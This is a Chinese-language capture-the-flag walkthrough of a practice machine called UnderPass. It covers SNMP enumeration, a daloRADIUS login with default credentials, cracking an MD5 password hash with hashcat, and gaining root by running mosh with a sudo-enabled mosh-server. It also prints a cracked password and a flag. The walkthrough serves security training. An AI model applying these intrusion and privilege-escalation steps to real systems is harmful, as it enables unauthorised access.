扫到22、80端口
dirseach扫不出啥
nmap扫一下udp端口,发现开放161端口,snmp v1v2服务
-A
选项获取目标主机的详细信息,包括操作系统、服务版本、脚本扫描等。
-sV
获取服务版本信息。
-Pn
跳过主机发现,直接对目标进行扫描。
-sU
扫描目标主机的 UDP 端口。
使用snmpwalk扫一下,发现关键信息daloradius
检索一下index.php,发现daloradius/app/users/index.php
等几个路由
到达登录页面,找一下默认初始密码尝试登录,md账户密码错误
Installing daloRADIUS · lirantal/daloradius Wiki
- 用户名:
administrator
- 密码:
radius
发现还有其他登录页/daloradius/app/operators/login.php
成功登入
翻一翻发现最有用的信息就是这个Users了
hashcat爆破一下
echo 412DD4759978ACFCC81DEAB01B382403 > hash
hashcat -m 0 -a 0 hash /usr/share/wordlists/rockyou.txt
underwaterfriends
尝试ssh
像之前起点一样,sudo -l
看一下当前用户可以执行的 sudo
命令的选项,发现mosh-server可以sudo
mosh用于ssh,mosh-server服务端
svcMosh@underpass:~$ mosh-server -h
Usage: mosh-server new [-s] [-v] [-i LOCALADDR] [-p PORT[:PORT2]] [-c COLORS] [-l NAME=VALUE] [-- COMMAND...]
svcMosh@underpass:~$ mosh -h
Usage: /usr/bin/mosh [options] [--] [user@]host [command...]
--client=PATH mosh client on local machine
(default: "mosh-client")
--server=COMMAND mosh server on remote machine
(default: "mosh-server")
--predict=adaptive local echo for slower links [default]
-a --predict=always use local echo even on fast links
-n --predict=never never use local echo
--predict=experimental aggressively echo even when incorrect
-4 --family=inet use IPv4 only
-6 --family=inet6 use IPv6 only
--family=auto autodetect network type for single-family hosts only
--family=all try all network types
--family=prefer-inet use all network types, but try IPv4 first [default]
--family=prefer-inet6 use all network types, but try IPv6 first
-p PORT[:PORT2]
--port=PORT[:PORT2] server-side UDP port or range
(No effect on server-side SSH port)
--bind-server={ssh|any|IP} ask the server to reply from an IP address
(default: "ssh")
--ssh=COMMAND ssh command to run when setting up session
(example: "ssh -p 2222")
(default: "ssh")
--no-ssh-pty do not allocate a pseudo tty on ssh connection
--no-init do not send terminal initialization string
--local run mosh-server locally without using ssh
--experimental-remote-ip=(local|remote|proxy) select the method for
discovering the remote IP address to use for mosh
(default: "proxy")
--help this message
--version version and copyright information
Please report bugs to mosh-devel@mit.edu.
Mosh home page: https://mosh.org
--server=COMMAND
可以用于指定远程的mosh-server服务,默认是mosh-server
mosh 127.0.0.1
mosh --server="mosh-server" 127.0.0.1
#以上两种相同
mosh-server是可以sudo使用的,如果--server
指定远程服务端为sudo版mosh-server,是否可以提权root呢?
mosh --server="sudo mosh-server" 127.0.0.1
9290acda8a407b44cc0ff956e1b2d870